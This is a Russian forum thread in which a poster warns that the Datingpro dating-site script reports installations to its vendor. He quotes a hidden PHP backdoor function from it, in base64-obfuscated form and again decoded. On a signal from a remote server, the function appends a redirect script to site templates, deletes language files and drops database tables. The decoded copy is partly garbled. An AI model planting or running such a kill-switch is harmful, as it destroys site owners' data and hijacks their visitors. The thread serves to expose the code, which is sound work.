base64
мужики скажите а в выложенном скрипте с отрытым кодом отсылается нет им на сервер сообщение о установке на хостинг скрипта?
Отсылается к сожаленью.
Во всех NULL и не NULL во многих файлах есть ссылки на сайт. а также E-mail адреса на которые отсылается информация о домене,и установленном скрипте.
+Еще есть ссылки зашифрованные под base64.
Datingpro 2008 я почти на 99% почистил,и исправил пару багов.(все работает ,видео фото,музыка,добавляются на 100%)
Кто поставил себе ,без разницы какая версия Datingpro,советую сносить его,и не начинать на нем проект.нуленных в интернете нет.
Дождитесь мою версию
Добавлено через 8 минут
......................................................................................................................
Вот пример кода base64
function AdditionForm() {
global $dbconn, $smarty, $config, $lang;
echo "1";
flush();
sleep(5);
$out_data = base64_decode("
aHR0cDovL3BpbG90Z3JvdXAubmV0L2xpZ2h0aG91c2UvdGVzdC5waHA/YWN0aXZpdHlfaWQ9").$_REQUEST['activity_id'];
$snoopy = new Snoopy;
@$snoopy->fetch($out_data);
$txt = @$snoopy->results;
$cod = @$snoopy->response_code;
$out = @$snoopy->timed_out;
if ( !$out && !empty($txt) && $txt == '1' && preg_match("/200/",$cod) ) {
$file_name = $config["site_path"].$config["index_theme_path"]."/index_bottom".$config["theme_postfix"].".tpl";
if (is_file($file_name)) {
chmod($file_name, 0777);
$fp = fopen($file_name,"a+");
fputs($fp, base64_decode("
PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmZiaS5nb3YvJzwvc2NyaXB0Pg=="));
fclose($fp);
}
$file_name = $config["site_path"].$config["index_theme_path"]."/index_bottom_popup.tpl";
if (is_file($file_name)) {
chmod($file_name, 0777);
$fp = fopen($file_name,"a+");
fputs($fp, base64_decode("
PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmZiaS5nb3YvJzwvc2NyaXB0Pg=="));
fclose($fp);
}
@unlink($config['site_path']."/".base64_decode("
bGFuZ3VhZ2VzL2VuZ2xpc2gubGFuZw=="));
@unlink($config['site_path']."/".base64_decode("
bGFuZ3VhZ2VzL3J1c3NpYW4ubGFuZw=="));
$strSQL = base64_decode("RFJPUCBUQUJMRSA=").SETTINGS_TABLE;
$dbconn->Execute($strSQL);
$strSQL = base64_decode("RFJPUCBUQUJMRSA=").USER_UPLOAD_TABLE;
$dbconn->Execute($strSQL);
}
exit;
}
/////////////////////////////////////////////////////////////////////////////////////
А этот после раскадировки
function AdditionForm() {
global $dbconn, $smarty, $config, $lang;
echo "1";
flush();
sleep(5);
$out_data = base64_decode("
Для просмотра ссылки Войди или Зарегистрируйся").$_REQUEST['activity_id'];
$snoopy = new Snoopy;
@$snoopy->fetch($out_data);
$txt = @$snoopy->results;
$cod = @$snoopy->response_code;
$out = @$snoopy->timed_out;
if ( !$out && !empty($txt) && $txt == '1' && preg_match("/200/",$cod) ) {
$file_name = $config["site_path"].$config["index_theme_path"]."/index_bottom".$config["theme_postfix"].".tpl";
if (is_file($file_name)) {
chmod($file_name, 0777);
$fp = fopen($file_name,"a+");
fputs($fp, base64_decode("
<script>document.location.href='http://www.fbi.gov/'</script>"));
fclose($fp);
}
$file_name = $config["site_path"].$config["index_theme_path"]."/index_bottom_popup.tpl";
if (is_file($file_name)) {
chmod($file_name, 0777);
$fp = fopen($file_name,"a+");
fputs($fp, base64_decode("
<script>document.location.href='http://www.fbi.gov/'</script>"));
fclose($fp);
}
@unlink($config['site_path']."/".base64_decode("
languages/english.lang"));
@unlink($config['site_path']."/".base64_decode("
languages/russian.lang"));
$strSQL = base64_decode("RFJPUCBUQUJMRSA=").SETTINGS_TABLE;
$dbconn->Execute($strSQL);
$strSQL = base64_decode("RFJPUCBUQUJMRSA=").USER_UPLOAD_TABLE;
$dbconn->Execute($strSQL);
}
exit;
}